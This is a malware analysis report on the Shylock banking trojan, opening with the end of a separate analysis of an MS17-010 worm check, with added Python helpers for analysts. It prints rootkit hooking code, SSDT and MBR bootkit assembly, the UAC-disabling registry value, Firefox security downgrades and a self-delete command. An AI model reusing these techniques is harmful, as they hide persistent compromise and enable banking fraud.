    && nt_status_3 == 0xC0u)           // and nt_status byte #3=C0
     {                                 // if the little-endian nt_status==0xC0000205
          closesocket(__hSocket);
          return 1; // return TRUE, host is vulnerable to MS17-010
     }
...
return 0; // return FALSE - the host is NOT vulnerable

If the host is vulnerable to MS17-010, the worm waits for three seconds and then checks if it is already infected with DOUBLEPULSAR – in order to replicate itself, it needs an active DOUBLEPULSAR backdoor to be installed at the host.

In order to check that, it builds and then submits an SMB Trans2 Request (trans2_request).

As seen below, the subcommand field within trans2_request request is set to SESSION_SETUP, which is a covert beacon request to the DOUBLEPULSAR backdoor:

If the host is infected with DOUBLEPULSAR, the response will contain "Multiplex ID" set to 81 (0x51). Here, the worm sends trans2_request request, and checks if multiplex_id equals 0x51:
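The two header checks this appendix walks through, the PeekNamedPipe status bytes and the Trans2 Multiplex ID, as an added Python parser a pcap analyst could run over captured SMB replies; this is not the worm's code or the report's. The sample frames are constructed, and the command codes plus the reply flags used in them are assumed typical values.

```python
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_TRANSACTION = 0x25       # PeekNamedPipe travels as an SMB_COM_TRANSACTION subcommand
SMB_COM_TRANSACTION2 = 0x32      # the Trans2 request that carries the DOUBLEPULSAR beacon
# The worm compares the status bytes 05, 02, 00, C0 one by one; read little-endian
# that is 0xC0000205, STATUS_INSUFF_SERVER_RESOURCES.
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
DOUBLEPULSAR_MID = 0x51          # Multiplex ID an infected host echoes in its Trans2 reply

# SMB1 header after the 4-byte magic: Command, Status, Flags, Flags2, PIDHigh,
# SecurityFeatures(8), Reserved(2), TID, PIDLow, UID, MID; 32 bytes with the magic.
_HDR_FMT = "<BIBHH8x2xHHHH"


def build_smb_frame(command, status, tid=0, pid=0xFEFF, uid=0, mid=0, body=b""):
    """Build a NetBIOS-framed SMB1 message; used here only to construct sample replies.
    Flags 0x98 / Flags2 0xC807 are assumed typical server reply values."""
    hdr = SMB_MAGIC + struct.pack(_HDR_FMT, command, status, 0x98, 0xC807,
                                  pid >> 16, tid, pid & 0xFFFF, uid, mid)
    payload = hdr + body
    return b"\x00" + len(payload).to_bytes(3, "big") + payload   # type 0, 24-bit length


def parse_smb_header(frame):
    """Parse the NetBIOS header plus the SMB1 header of a captured message into a dict."""
    if len(frame) < 36:
        raise ValueError("frame too short for NetBIOS + SMB1 headers")
    if frame[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    if int.from_bytes(frame[1:4], "big") != len(frame) - 4:
        raise ValueError("NetBIOS length field does not match the frame")
    if frame[4:8] != SMB_MAGIC:
        raise ValueError("missing 0xFF 'SMB' magic")
    (command, status, flags, flags2, pid_high,
     tid, pid_low, uid, mid) = struct.unpack_from(_HDR_FMT, frame, 8)
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "tree_id": tid, "process_id": (pid_high << 16) | pid_low,
            "user_id": uid, "multiplex_id": mid}


def status_bytes(hdr):
    """The status as the four little-endian bytes the worm compares, byte #0 first."""
    return tuple(struct.pack("<I", hdr["status"]))


def is_ms17_010_probe_hit(hdr):
    """The worm's verdict on a PeekNamedPipe reply: status bytes 05 02 00 C0."""
    return (hdr["command"] == SMB_COM_TRANSACTION
            and status_bytes(hdr) == (0x05, 0x02, 0x00, 0xC0))


def is_doublepulsar_ping_reply(hdr):
    """A Trans2 reply whose Multiplex ID is 0x51 is the backdoor answering the beacon."""
    return hdr["command"] == SMB_COM_TRANSACTION2 and hdr["multiplex_id"] == DOUBLEPULSAR_MID


if __name__ == "__main__":
    # Constructed sample replies, not captured traffic.
    peek = build_smb_frame(SMB_COM_TRANSACTION, STATUS_INSUFF_SERVER_RESOURCES,
                           tid=0x0800, uid=0x0800, mid=0x40)
    trans2 = build_smb_frame(SMB_COM_TRANSACTION2, 0, tid=0x0800, uid=0x0800, mid=0x51)
    for name, frame in (("PeekNamedPipe reply", peek), ("Trans2 reply", trans2)):
        h = parse_smb_header(frame)
        print(f"{name}: status={h['status']:#010x} mid={h['multiplex_id']:#04x} "
              f"ms17-010={is_ms17_010_probe_hit(h)} doublepulsar={is_doublepulsar_ping_reply(h)}")
```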

Shylock
Written by Sergei Shevchenko, Cyber Research



"I will buy with you, sell with you, talk with you, walk with you, and so following;
but I will not eat with you, drink with you, nor pray with you"
Shylock, 1.3.37
The Merchant of Venice, Shakespeare, 1564

Shylock-The-Trojan will indeed talk to you via Skype, and walk with you while you browse the Internet or buy or sell online. Ironically, this Man-in-the-Browser (MitB) trojan considers the homeland of Shakespeare its target #1.

Being a banking trojan that targets multiple banking institutions, it employs a plug-in architecture that allows the main 'framework' to be complemented with additional functionality. Shylock plug-ins are DLLs with the exports:
  • Destroy()
  • Init()
  • Start()
This description lists Shylock's main components one by one.

Driver

The Shylock driver is a kernel-mode rootkit designed to hide files, processes, registry entries, and traffic associated with Shylock. In addition, it switches off Windows UAC by resetting the value:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
EnableLUA = 0x00000000


With UAC disabled, Windows Vista/7/8 will no longer prompt for consent or for credentials for a valid administrator account before launching a Shylock executable, allowing it to start silently.

If the Windows version is Vista, 7, or 8, it will obtain the "NSI proxy" driver object and then hook its IRP_MJ_DEVICE_CONTROL dispatch routine. On a pre-Vista Windows OS, it will also hook the IRP_MJ_DEVICE_CONTROL dispatch routine within the TCP driver.

The reason why Shylock hooks the "NSI proxy" driver is to hide itself from netstat, a tool often used by technically savvy users to check the active connections present on a compromised PC: to inspect any open ports and to see which executables hold active connections. In those scenarios where Shylock engages its user-mode VNC component, the remote attacker has full remote access to the compromised system: its graphical desktop is fully relayed to the attacker, along with the keyboard and mouse events. The generated VNC traffic is thus relatively 'heavy', so there is a high chance it will eventually draw the end user's attention (e.g. the user might keep wondering why the modem LEDs are blinking so wildly). In that case, netstat becomes one of the first tools to be run to see what is going on with the system, and Shylock doesn't like that.

Whenever netstat is run, its calls are marshalled into the kernel and are eventually handled by the "NSI proxy" driver. The hook Shylock installs there is known as an IRP hook. The hook handler monitors the enumerated connections, and whenever it locates a TCP connection that involves a port number it needs to hide (e.g. the one carrying VNC traffic), it removes that TCP connection entry from the enumerated list. Element N is removed by overwriting its contents with the contents of element N+1 and then decrementing the total number of list elements by 1. As a result, the list of connections returned by netstat never contains any active connections held by Shylock's user-mode components.

Here is the reconstructed logic of the hooker:

if (MajorVersion < 6) // if pre-Vista, hook Tcp driver; otherwise, skip this step
{
    RtlInitUnicodeString(&uniTcpDevice, L"\\Device\\Tcp");
    status = IoGetDeviceObjectPointer(&uniTcpDevice,
                                      1u,
                                      &FileObject,
                                      &DeviceObject); // return device object
    status2 = status;
    if (status >= 0) // if status is OK
    {
        driverTcpDevice = (int)DeviceObject->DriverObject; // get driver object
        IRP_MJ_DEVICE_CONTROL = driverTcpDevice + 0x70;    // +0x70 is explained below
        fn_IRP_MJ_DEVICE_CONTROL = *(DWORD *)(driverTcpDevice + 0x70);
        if (fn_IRP_MJ_DEVICE_CONTROL) // if the returned dispatch routine is Ok
        {
            hook_IRP_MJ_DEVICE_CONTROL = get_hook_IRP_MJ_DEVICE_CONTROL_tcp;

replace_original_IRP: // swap original pointer with the hook
            _InterlockedExchange((signed __int32 *)IRP_MJ_DEVICE_CONTROL,
                                 hook_IRP_MJ_DEVICE_CONTROL);
            return 0;
        }
        return 0;
    }
exit:
    ms_exc.disabled = -1;
    return status;
}

RtlInitUnicodeString((PUNICODE_STRING)&uniNsiDrvName, L"\\Driver\\nsiproxy");
status = ObReferenceObjectByName(&uniNsiDrvName,
                                 64,
                                 0,
                                 0,
                                 IoDriverObjectType,
                                 0,
                                 0,
                                 &pNsiDrvObj); // get driver object
status2 = status;
if (status < 0)
{
    goto exit;
}

IRP_MJ_DEVICE_CONTROL = pNsiDrvObj + 0x70; // 0x70 means
                                           // MajorFunction[IRP_MJ_DEVICE_CONTROL]

fn_IRP_MJ_DEVICE_CONTROL_2 = *(int (__stdcall **)(DWORD, DWORD))(pNsiDrvObj + 0x70);

if (fn_IRP_MJ_DEVICE_CONTROL_2) // if the returned dispatch routine is Ok
{
    hook_IRP_MJ_DEVICE_CONTROL = get_hook_IRP_MJ_DEVICE_CONTROL_nsiproxy;
    goto replace_original_IRP; // get the hooked DeviceIoControl,
                               // and swap it with the original one
}

The +0x70 offset in the listing above is referencing MajorFunction[IRP_MJ_DEVICE_CONTROL] within the driver object.

Here is why:
the driver object structure is declared as:

#define IRP_MJ_MAXIMUM_FUNCTION         0x1b
..
typedef struct _DRIVER_OBJECT {
/* 2 */ CSHORT Type;                            // offset = 0x00
/* 2 */ CSHORT Size;                            // offset = 0x02
/* 4 */ PDEVICE_OBJECT DeviceObject;            // offset = 0x04
/* 4 */ ULONG Flags;                            // offset = 0x08
/* 4 */ PVOID DriverStart;                      // offset = 0x0c
/* 4 */ ULONG DriverSize;                       // offset = 0x10
/* 4 */ PVOID DriverSection;                    // offset = 0x14
/* 4 */ PDRIVER_EXTENSION DriverExtension;      // offset = 0x18
/* 8 */ UNICODE_STRING DriverName;              // offset = 0x1c (USHORT, USHORT, PWSTR)
/* 4 */ PUNICODE_STRING HardwareDatabase;       // offset = 0x24
/* 4 */ PFAST_IO_DISPATCH FastIoDispatch;       // offset = 0x28
/* 4 */ PDRIVER_INITIALIZE DriverInit;          // offset = 0x2c
/* 4 */ PDRIVER_STARTIO DriverStartIo;          // offset = 0x30
/* 4 */ PDRIVER_UNLOAD DriverUnload;            // offset = 0x34
/* 4 * 0x1c */ PDRIVER_DISPATCH MajorFunction[IRP_MJ_MAXIMUM_FUNCTION + 1]; // offset = 0x38
} DRIVER_OBJECT;

Its MajorFunction list contains IRP_MJ_MAXIMUM_FUNCTION + 1 = 0x1c elements, and its offset in the structure is 0x38. To find out which dispatch routine is referenced by the offset 0x70, subtract 0x38 (the list's offset within the structure) from 0x70 and divide by 4 (the size of each pointer within the list):

(0x70 - 0x38) / 4 = 0x0e

The 15th (0x0e) element of the dispatch routines is declared as:

#define IRP_MJ_DEVICE_CONTROL 0x0e
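The same offset arithmetic as an added Python check (not part of the Shylock analysis): a ctypes mirror of the 32-bit DRIVER_OBJECT layout confirms the 0x38 base and maps any hook offset seen in disassembly back to its MajorFunction index, rather than trusting hand-written offset comments. It assumes the 32-bit layout shown above, with every pointer 4 bytes wide.

```python
import ctypes

IRP_MJ_MAXIMUM_FUNCTION = 0x1B
IRP_MJ_DEVICE_CONTROL = 0x0E
PTR32 = ctypes.c_uint32   # every pointer is 4 bytes on the 32-bit Windows the driver targets


class UNICODE_STRING32(ctypes.Structure):
    _fields_ = [("Length", ctypes.c_uint16),
                ("MaximumLength", ctypes.c_uint16),
                ("Buffer", PTR32)]          # 8 bytes in total


class DRIVER_OBJECT32(ctypes.Structure):
    # Field order as in the declaration above; ctypes computes the offsets for us.
    _fields_ = [("Type", ctypes.c_int16),
                ("Size", ctypes.c_int16),
                ("DeviceObject", PTR32),
                ("Flags", ctypes.c_uint32),
                ("DriverStart", PTR32),
                ("DriverSize", ctypes.c_uint32),
                ("DriverSection", PTR32),
                ("DriverExtension", PTR32),
                ("DriverName", UNICODE_STRING32),
                ("HardwareDatabase", PTR32),
                ("FastIoDispatch", PTR32),
                ("DriverInit", PTR32),
                ("DriverStartIo", PTR32),
                ("DriverUnload", PTR32),
                ("MajorFunction", PTR32 * (IRP_MJ_MAXIMUM_FUNCTION + 1))]


def field_offset(name):
    """Byte offset of a DRIVER_OBJECT field, e.g. field_offset("MajorFunction") == 0x38."""
    return getattr(DRIVER_OBJECT32, name).offset


def driver_object_size():
    """Total size of the 32-bit structure (0x38 + 0x1c pointers)."""
    return ctypes.sizeof(DRIVER_OBJECT32)


def major_function_offset(index):
    """Offset of MajorFunction[index] inside the driver object."""
    if not 0 <= index <= IRP_MJ_MAXIMUM_FUNCTION:
        raise ValueError(f"no IRP_MJ index {index:#x}")
    return field_offset("MajorFunction") + index * ctypes.sizeof(PTR32)


def major_function_index(offset):
    """Map an offset seen in disassembly (driver_object + 0x70) back to its IRP_MJ index."""
    rel = offset - field_offset("MajorFunction")
    if rel < 0 or rel % ctypes.sizeof(PTR32):
        raise ValueError(f"offset {offset:#x} does not point at a MajorFunction slot")
    index = rel // ctypes.sizeof(PTR32)
    if index > IRP_MJ_MAXIMUM_FUNCTION:
        raise ValueError(f"offset {offset:#x} lies past the end of MajorFunction[]")
    return index


if __name__ == "__main__":
    print(f"MajorFunction[] starts at {field_offset('MajorFunction'):#x}")
    print(f"+0x70 -> MajorFunction[{major_function_index(0x70):#x}]"
          f" (IRP_MJ_DEVICE_CONTROL = {IRP_MJ_DEVICE_CONTROL:#x})")
```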

Knowing that, the source code of the Shylock driver can be reconstructed into a meaningful format that can now be searched online to see where the Shylock authors may have stolen that code from. Why stolen? Given the complexity of this code on the one hand, and the ROI (return-on-investment) principle on the other, malware products like Shylock often result from the integration of solutions that are already available on the 'market'. At the end of the day, it is much easier for them to find a code snippet online and plug it into the malware.

The Shylock driver is no different; here is the snippet of code that they have 'borrowed'. By having access to the same source, we can compile and debug the very same code, only now with the privilege of stepping through it with the help of the VisualDDK tool, and seeing exactly how the Shylock driver places its hooks and how those hooks affect netstat.

Below is a screenshot of the driver code in action. At the breakpoint seen below, the code is replacing the N-th TCP entry with TCP entry N+1 (TcpEntry[i] <- TcpEntry[i+1]):



The local entry's port number in our example is 139 (or 0x8B00 after applying htons() to it). As a result, any connections that involve port 139 disappear from the netstat output:



Apart from the IRP hooks the Shylock driver places on the IRP_MJ_DEVICE_CONTROL dispatch routines of the Tcp and Nsi Proxy drivers, it also hooks the System Service Descriptor Table (SSDT). The functions it hooks are:
  • ZwEnumerateKey
  • ZwEnumerateValueKey
  • ZwQuerySystemInformation
  • ZwQueryDirectoryFile
  • ZwAllocateVirtualMemory
The KeServiceDescriptorTable patching is wrapped in conventional cli/sti blocks: the cli block disables interrupts and clears the write protection, and the sti block restores everything afterwards:

.text:000130AC   cli                                     ; disable interrupts
.text:000130AD   mov     eax, cr0                        ; get CR0
.text:000130B0   and     eax, 0FFFEFFFFh                 ; reset Write Protect flag; when clear,
                                                         ; it allows supervisor-level procedures
                                                         ; to write into read-only pages
.text:000130B5   mov     cr0, eax                        ; save it back into CR0

.text:000130B8   mov     eax, KeServiceDescriptorTable
.text:000130BD   mov     eax, [eax]
.text:000130BF   mov     dword ptr [ecx+eax], offset hook_ZwEnumerateKey
.text:000130C6   mov     eax, KeServiceDescriptorTable
.text:000130CB   mov     eax, [eax]
.text:000130CD   mov     ecx, [ebp+var_14]
.text:000130D0   mov     dword ptr [edx+eax], offset hook_ZwEnumerateValueKey
.text:000130D7   mov     eax, KeServiceDescriptorTable
.text:000130DC   mov     eax, [eax]
.text:000130DE   mov     dword ptr [esi+eax], offset hook_ZwQuerySystemInformation
.text:000130E5   mov     eax, KeServiceDescriptorTable
.text:000130EA   mov     eax, [eax]
.text:000130EC   mov     dword ptr [ecx+eax], offset hook_ZwQueryDirectoryFile

.text:000130F3   mov     eax, cr0                        ; get CR0 (with the cleared WP flag)
.text:000130F6   or      eax, offset _10000H             ; set Write Protect flag to prevent
                                                         ; writing into read-only pages
.text:000130FB   mov     cr0, eax                        ; save it back into CR0
.text:000130FE   sti                                     ; allow interrupts

hook_ZwQuerySystemInformation handles those ZwQuerySystemInformation() calls that request the SystemProcessInformation class of system information, and is basically a rip-off of Greg Hoglund's process hider.

Skype Replicator

The Skype replicator component of Shylock relies on the Skype Control API, which uses window messages for communication with Skype.

First, it broadcasts the SkypeControlAPIDiscover message to find the Skype window handle. If Skype is running, it responds with a SkypeControlAPIAttach message.

Next, Shylock starts controlling Skype via the Control API by sending it window messages. When Skype handles the communication request coming from Shylock, it asks the user whether the application in question should be allowed access to Skype or not. Shylock locates the window within the Skype application that contains 2 horizontal buttons - the first button is Allow, the second is Deny. Next, it attempts to send a click to the Allow button in order to trick Skype into accepting it as a client:



As soon as the click is submitted, the client is accepted, as demonstrated with the debugged code below:



Once Shylock tricks Skype into accepting it as a client, it starts sending out messages to the contacts found in Skype. Any messages that Skype sends are stored in Skype's main.db file, which is a standard SQLite database. Shylock accesses this database and deletes its own messages and file transfers so that the user cannot find them in the history.

Shylock also tries to switch off the sound alert settings within Skype by sending 'clicks' to its options window, so that all the communications it initiates are carried out silently, without drawing any attention from the end user.

The Skype component of Shylock communicates with the remote server by submitting the Skype installation details to it and fetching the configuration data for its own functionality.

BackSocks

The BackSocks component of Shylock is a fully functional reverse (backconnect) SOCKS proxy server that is based on the source code of a legitimate proxy server, 3Proxy, developed by 3APA3A ('zaraza', or 'contagion').

The SOCKS proxy allows external attackers to tunnel their traffic through the compromised PC into the internal (corporate) network. The connection with the proxy server is not established in the classic way, where a backdoor trojan opens a port and accepts incoming connections from the remote attacker - such schemes no longer work due to the wide adoption of NAT and firewalls. Instead, the SOCKS proxy initiates a reverse connection to the remote server (back-connects to it), and once that connection is established, the proxy server starts tunneling traffic into the internal network, as if the external attacker were physically located inside it.

By having access to the internal network through the SOCKS proxy, Shylock may reach internal resources such as mail servers, source control servers, domain controllers, etc.



The ability to hide from netstat the TCP connections the proxy holds with the remote attacker helps it avoid early detection of anomalies by network administrators.

Bootkit

In order to install the driver, Shylock engages a bootkit module that relies on an infection of the Master Boot Record (MBR). The bootkit module is a PE executable that is protected with a run-time packer.

When run, the bootkit executable first checks whether the following files can be opened, and if not (e.g. the files do not exist), it continues:
  • C:\GRLDR
  • C:\XELDZ
The bootkit can be started from the following start-up registry entry:

HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    FlashPlayerUpdate = %PATH_TO_BOOTKIT%

Next, it enumerates the first 8 physical drives (#0 - #7) connected to the local computer, starting from drive #0:
\\.\PhysicalDrive0

For every drive, it invokes the MBR infection routine. The routine starts by reading the drive geometry parameters with DeviceIoControl(IOCTL_DISK_GET_DRIVE_GEOMETRY).

Next, it reads the first 512 bytes from the sector #0 (MBR), and then checks if its last 2 bytes are 55AA - a signature that identifies a bootable drive.

If the drive is not bootable, it is skipped:

.text:004024E9   xor     ebx, ebx                        ; EBX is 0
...
.text:0040255E   push    ebx                             ; dwMoveMethod = 0
.text:0040255F   push    ebx                             ; lpDistanceToMoveHigh = 0
.text:00402560   push    ebx                             ; lDistanceToMove = 0
.text:00402561   push    edi                             ; hFile
.text:00402562   call    ds:SetFilePointer               ; set pointer at offset 0
.text:00402568   push    ebx                             ; lpOverlapped
.text:00402569   lea     eax, [ebp+NumberOfBytesRead]
.text:0040256C   push    eax                             ; lpNumberOfBytesRead
.text:0040256D   push    512                             ; nNumberOfBytesToRead
.text:00402572   lea     eax, [ebp+Buffer]
.text:00402578   push    eax                             ; lpBuffer
.text:00402579   push    edi                             ; hFile
.text:0040257A   call    ds:ReadFile                     ; read 512 bytes
.text:00402580   call    esi                             ; GetLastError
.text:00402582   test    eax, eax
.text:00402584   jnz     next_drive                      ; if error, skip it
.text:0040258A   mov     eax, 0AA55h                     ; compare last 2 bytes
.text:0040258F   cmp     [ebp+_510], ax                  ; (512-2) with 55AA-signature
.text:00402596   jnz     short close_handle_next_drive

If the drive is bootable, the bootkit encrypts a copy of the original MBR with a random XOR key and saves the encrypted copy into sector #57.

The bootkit stores its components in 4 sectors (#58, #59, #60 and #61) and also in a number of sectors closer to the end of the physical drive (around 17K-18K sectors before the end).

Once it writes all the sectors, it tries to delete itself by running the following command with the command line interpreter:
/c ping -n 2 127.0.0.1 & del /q "%PATH_TO_BOOTKIT%" >> nul

The ping command with the -n switch is used here as a way to make the command line interpreter wait for 2 seconds before it attempts to delete the bootkit executable.

Master Boot Record (MBR)

The MBR is infected with code that is similar to that of other bootkits such as Mebroot or eEye BootRoot.

MBR code performs the following actions:

First, it reads 4 sectors (#58, #59, #60, #61) into memory at 0x7E00, immediately following the MBR code loaded at address 0x7C00. Next, it allocates a new area of memory and copies there 5 sectors' worth of data (512 bytes each, 2,560 bytes in total): the loaded MBR code followed by the 4 sectors it has just read. It then passes control to the code copied into the newly allocated area.

The new memory area is at address 0x9E000, formed as segment register * 16 + offset 0:
(0x9E00 << 4) + 0 = 0x9E000.

Next, the code locates the XOR key stored at offset 0x5c. The key is random and is implanted by the bootkit. The infected MBR code then reads the contents of sector #57 over the MBR image and decrypts it with the same XOR key, thus fully restoring the original MBR (sector #0) in memory.

Still running in the newly allocated area, the code then restores the remaining bytes from its own offset 0x10D to 0x18F by applying the same XOR key. Once restored, these bytes turn out to be the hook handler code for interrupt (INT) 13h - the BIOS interrupt used to read sectors.

Once the INT 13h hook handler is decoded, the original INT 13h vector is replaced with the address of the decoded handler, after which the code jumps back into the original, fully restored MBR code from sector 0:

MEM:9E0F0   mov     eax, dword ptr ds:offset_4c             ; 4Ch = 13h * 4
MEM:9E0F4   mov     dword ptr es:INT13HANDLER, eax          ; save into JMP instr below
MEM:9E0F9   mov     word ptr ds:offset_4c, offset Int13Hook ; place the hook
MEM:9E0FF   mov     word ptr ds:offset_4e, es
MEM:9E103   sti
MEM:9E104   popad
MEM:9E106   pop     ds
MEM:9E107   pop     sp
MEM:9E108   jmp     start                                   ; jump to BOOTORG (0000h:7C00h)

With the INT 13h vector replaced, the entry at ds:offset_4c now contains 9E10D - the address of the INT 13h hook handler within the allocated conventional memory. As control is passed back to the original MBR, the system starts booting normally, and the hooked INT 13h call is eventually invoked by the MBR code - this is when the hook handler is activated.

The INT 13h hook handler is interested in 2 types of INT 13h calls - the normal sector read (AH = 02h) and the extended read (AH = 42h) used with larger disks, as shown below:

MEM:9E10D Int13Hook proc far
MEM:9E10D   pushf                                       ; handle two types of INT 13 below:
MEM:9E10E   cmp     ah, 42h ; 'B'                       ; 1) IBM/MS INT 13 Extensions - EXTENDED READ
MEM:9E111   jz      short Int13Hook_ReadRequest
MEM:9E113   cmp     ah, 2                               ; 2) DISK - READ SECTOR(S) INTO MEMORY
MEM:9E116   jz      short Int13Hook_ReadRequest
MEM:9E118   popf
MEM:9E119
MEM:9E119   [jmp opcode, followed with the original INT 13 vector]
MEM:9E11A INT13HANDLER db 4 dup(0)                      ; original vector is stored here
MEM:9E11E
MEM:9E11E Int13Hook_ReadRequest:
MEM:9E11E   mov     byte ptr cs:INT13LASTFUNCTION, ah
MEM:9E123   popf
MEM:9E124   pushf                                       ; push Flags, simulating INT
MEM:9E125   call    dword ptr cs:INT13HANDLER           ; call original handler
MEM:9E12A   jb      short Int13Hook_ret                 ; quit if failed
MEM:9E12C   pushf
MEM:9E12D   cli
MEM:9E12E   push    es
MEM:9E12F   pusha
MEM:9E130   [mov ah, ??] opcode - operand is patched at MEM:9E11E
MEM:9E131 INT13LASTFUNCTION:
MEM:9E131   [mov ah, ??] operand, 0 by default
MEM:9E132   cmp     ah, 42h ; 'B'                       ; IBM/MS INT 13 Extensions - EXTENDED READ
MEM:9E135   jnz     short Int13Hook_notextread
MEM:9E137   lodsw
MEM:9E138   lodsw
MEM:9E139   les     bx, [si]
MEM:9E13B   assume es:nothing

The handler then scans and patches the code of the OSLOADER module (part of NTLDR) as it is read from the system partition during Windows start-up. OSLOADER executes in protected mode, and by patching it, Shylock forces it to execute the payload loader code in protected mode as well.

To patch it in the right place, the scanner looks for the byte sequence F0 85 F6 74 21 80, as shown below:

MEM:9E149 Int13Hook_scan_loop:
MEM:9E149   repne scasb
MEM:9E14B   jnz     short Int13Hook_scan_done
MEM:9E14D   cmp     dword ptr es:[di], 74F685F0h        ; F0 85 F6 74
MEM:9E155   jnz     short Int13Hook_scan_loop
MEM:9E157   cmp     word ptr es:[di+4], 8021h           ; 21 80
MEM:9E15D   jnz     short Int13Hook_scan_loop

These bytes correspond to the following code of the original loader:

.text:00422A6A E8 C2 12 00 00           call    near ptr unk_47DE1
.text:00422A6F 8B F0                    mov     esi, eax
.text:00422A71 85 F6                    test    esi, esi
.text:00422A73 74 21                    jz      short loc_46B46
.text:00422A75 80 3D F8 AE 43 00 00     cmp     byte_43AEF8, 0

Once these bytes are found within OSLOADER, the kernel patch from sector #58 is applied to the loader by directly overwriting its bytes:



The patched loader code may now look like this (compare to the original loader code above):

.text:00422A6A E8 C2 12 00 00           call    near ptr unk_47DE1
.text:00422A6F B8 33 E2 09 00           mov     eax, offset off_9E233
.text:00422A74 FF D0                    call    eax                     ; off_9E233
.text:00422A76 90                       nop
.text:00422A77 90                       nop
.text:00422A78 90                       nop
.text:00422A79 90                       nop
.text:00422A7A 90                       nop
.text:00422A7B 90                       nop
.text:00422A7C 90                       nop
...

The address off_9E233 points to the code loaded from sectors #58-#61 and corresponds to the Kernel Patcher shellcode. Once it gets control within OSLOADER, it executes in protected mode and starts invoking the subsequent stages of the bootkit that lead to the eventual driver installation.

Main Shylock Module

The main Shylock module is an executable that injects its code into other processes, communicates with the C&C server, fetches configuration files and plug-ins, fully monitors the Internet Explorer and Firefox browsers, and provides full backdoor access to the compromised system. The remote configuration files define its logic, such as which online banking sessions to intercept and how.

Shylock is a VM-aware threat: its anti-sandboxing code enumerates all the drivers installed on a compromised system, and for every driver it calculates a hash of its name; if the returned name hash is black-listed, Shylock will exit.

For example, in the snapshot below, Shylock computes a hash of 0x2FE483F3 for the enumerated driver vmscsi.sys (part of VMware). The code explicitly checks the hash against the hard-coded value 0x2FE483F3 and, in case of a match, quits.



In order to complicate code analysis and emulation, Shylock always calls APIs by their hashes. For instance, GetCommandLineA() is called through a stand-alone stub with a hard-coded API hash of 0xC66A1D2E:



The API hash calculation algorithm is trivial:

#include <windows.h>
#include <string.h>

DWORD GetHash(char *szApi)
{
    DWORD dwHash = 0;
    // the loop is bounded by strlen(), so the terminating NUL is never hashed
    for (DWORD i = 0; i < strlen(szApi); i++)
    {
        BYTE b = szApi[i];
        dwHash ^= b;                // mix in the next character of the API name
        __asm
        {
            ror dwHash, 3           ; rotate the 32-bit hash right by 3 bits
        }
        if (b == 0)                 // unreachable given the strlen() bound; kept as decompiled
        {
            break;
        }
    }
    return dwHash;
}
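To make the hashing concrete, here is an added Python example (not the post's code) that implements the same XOR/ROR-3 hash and uses it the way an analyst would when triaging a sample: pre-compute the hashes of a list of export names and resolve hard-coded hashes back to API names. The export list is a constructed sample, not Shylock's own.

```python
# Shylock-style API hash (XOR each byte into the hash, then ROR 3 on the
# 32-bit value) plus a reverse lookup table.  Added example, not the post's code.
MASK32 = 0xFFFFFFFF


def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits` (the x86 ROR instruction)."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def api_hash(name: str) -> int:
    """Port of the reconstructed GetHash(): for every character of the name
    (the terminating NUL is excluded, as the strlen() bound implies), XOR it
    into the hash and rotate the hash right by 3 bits."""
    h = 0
    for b in name.encode("ascii"):
        h ^= b
        h = ror32(h, 3)
    return h


def build_hash_table(export_names) -> dict:
    """Map hash -> export name for every name the analyst wants to recognise
    (in practice: every export of the DLLs the sample resolves from)."""
    return {api_hash(n): n for n in export_names}


def resolve_hashes(hashes, table: dict) -> list:
    """Translate hard-coded hashes pulled from a sample into API names; unknown
    hashes are reported as hex strings so that nothing is silently dropped."""
    return [table.get(h, "unknown:0x%08X" % h) for h in hashes]


# Constructed sample: a handful of kernel32 export names an analyst might load
# from a real export table (this is not a list taken from Shylock).
SAMPLE_EXPORTS = [
    "GetCommandLineA", "GetCommandLineW", "LoadLibraryA", "GetProcAddress",
    "VirtualAlloc", "CreateRemoteThread", "WriteProcessMemory",
]

if __name__ == "__main__":
    table = build_hash_table(SAMPLE_EXPORTS)
    # 0xC66A1D2E is the GetCommandLineA stub hash shown in the post;
    # 0x12345678 is a made-up value to show the unknown-hash path
    wanted = [0xC66A1D2E, 0x12345678]
    for h, name in zip(wanted, resolve_hashes(wanted, table)):
        print("0x%08X -> %s" % (h, name))
```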

Shylock spawns separate threads for different plugins. For example, it injects BackSocks server DLL into svchost.exe and starts a remote thread in it.

The trojan checks the host process name, and depending on the name, it installs different user-mode hooks for the process.

If the host process is the Firefox browser (FIREFOX.EXE), it loads nss3.dll and nspr4.dll and then places these hooks:

nspr4.dll:
  • PR_Read
  • PR_Write
  • PR_Close

nss3.dll:
  • CERT_VerifyCertName
  • CERT_VerifyCertNow

If the host process is Internet Explorer (IEXPLORE.EXE), it loads mshtml.dll and then places the following hooks:

ws2_32.dll:
  • send

wininet.dll:
  • HttpOpenRequestA/W
  • HttpSendRequestA/W
  • HttpSendRequestExA/W
  • InternetReadFile
  • InternetReadFileExA/W
  • InternetCloseHandle
  • InternetQueryDataAvailable
  • InternetSetStatusCallback

If the host process is Windows Explorer (EXPLORER.EXE) or one of the system processes USERINIT.EXE or RUNDLL32.EXE, it hooks:

ntdll.dll:
  • NtCreateThread/ZwCreateThread
  • NtCreateUserProcess/ZwCreateUserProcess
  • NtEnumerateValueKey/ZwEnumerateValueKey
  • NtQueryDirectoryFile/ZwQueryDirectoryFile

user32.dll:
  • ExitWindowsEx
  • GetMessageW

kernel32.dll:
  • HeapDestroy

advapi32.dll:
  • InitiateSystemShutdownExW

The purpose of the hooks above is to inject into newly launched processes and to hide Shylock's file and registry entries. If the user shuts down Windows, the hook handler attempts to recreate the files and the start-up registry entries, in order to persist even if the user has partially deleted the threat.

Once activated, Shylock deletes all Firefox cookies. Next, it searches for and overwrites the user.js files found in the %APPDATA%\Mozilla\Firefox\Profiles directory, thus manipulating the following security settings of the Firefox browser:

security.enable_tls = false
network.http.accept-encoding = ""
security.warn_viewing_mixed = false
security.warn_viewing_mixed.show_once = false
security.warn_submit_insecure = false
security.warn_submit_insecure.show_once = false


For example, whenever insecure form data is submitted, Firefox will not display its "Security Warning" dialogue - this lets Shylock work with fake/redirected sites without any objections from the browser.

